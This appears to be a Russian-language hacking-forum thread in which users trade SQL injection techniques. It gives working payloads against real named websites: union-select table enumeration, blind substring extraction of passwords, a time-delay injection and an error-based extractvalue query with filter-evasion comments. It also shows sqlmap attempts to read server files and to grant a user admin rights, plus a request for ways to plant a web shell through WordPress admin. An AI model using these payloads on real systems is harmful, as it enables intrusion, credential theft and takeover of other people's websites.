Создал на Денвере таблицу users где есть id и username Пишет ошибку: Сам запрос: Где почитать можно подробнее? Mysql символ " не совсем хорошо понимает!
боюсь, не выйдет. и запроса все вырезается и экранируется. можно бы было попробовать, если бы можно было внедриться в 2 поля
Не знаю как обойти фильторочек Code: http://psf.com.ua/modules.php?name=news&option=3&news_id=113+order+by+4+--+ Illegal Operation
PHP: http://psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,2,3,4+--+http://psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,table_name,3,4+from+information_schema.tables+--+
Почему при ручной эксплуатации blind sql, запросы: Code: or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+ or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+ Будут одинаково TRUE? PS 0x64='d' 0x44='D' Как в таком случае определить в каком регистре буква в пароле?
Можно ли как нибудь проверить полученный результат с помощью этойфункции, или же он работает только с одним символом? пример: нужно проверить итоговую сумму в выражении, чтоб не ошибиться с регистром Code: ascii(substring((select+password+from+users+where+id=1+limit+0,1),8,2))=0x4453+--+
Имеется сайт с sql-injections, но возникли впоросы с sqlmap Code: [Linux Debian] [Apache 2.4.10] [MySQL 5.0] ['10.0.16-MariaDB-1'] Privilege: USAGE Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: http://site.com/news.html?id=(SELECT 1582 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1582=1582,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat=main Не работает --file-read="/home/www/wwuser/user/www/index.php" (или тот же .htaccess, js не важно) Выдает пустой файл: Spoiler: Результат Code: [WARNING] reflective value(s) found and filtering out [INFO] retrieved: [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path) files saved to [1]: [*] C:\sqlmap\output\site.com\files\_home_www_wwuser_user_www_index.php (size differs from remote file) И тот же вопрос по --sql-query="UPDATE users SET admin=1 WHERE login=test" (как только не пробовал) Spoiler: Результат Code: [WARNING] execution of custom SQL queries is only available when stacked queries are supported UPDATE UPDATE users SET admin=1 WHERE login=test: None [INFO] fetched data logged to text files under 'C:\sqlmap\output\site.com\' Это из-за нехватки прав? Или что то другое мешает?
ну как бы для чтения файлов у вашего пользователя должны быть права file_priv, а для update в mysql нужна sqli в update. тут разделяются запросы на выборку и на изменение информации
Code: http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993' помогите с раскруткой
Code: http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993%27;WAITFOR%20DELAY%20%270:0:1%27--
www.haba.ch/?id_mitteilungeneintraege=-77+/*!12345union*/+%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+&typ=4 Как обойти фильтр from? таблица be_users
Code: http://o53xo.nbqweyjomnua.cmle.ru/?id_mitteilungeneintraege=-77+and%28extractvalue%281,/*!concat*/%280x3a,%28select+table_name+from+information_schema.tables+limit+1,1%29%29%29%29&typ=4 реакция на связку union select from. select from пропускает, поэтому здесь подходит error-based
Какие способы заливки шелла через wpadmin, если там а) отключено редактирование тем и плагинов б) невозможно загружать php ?
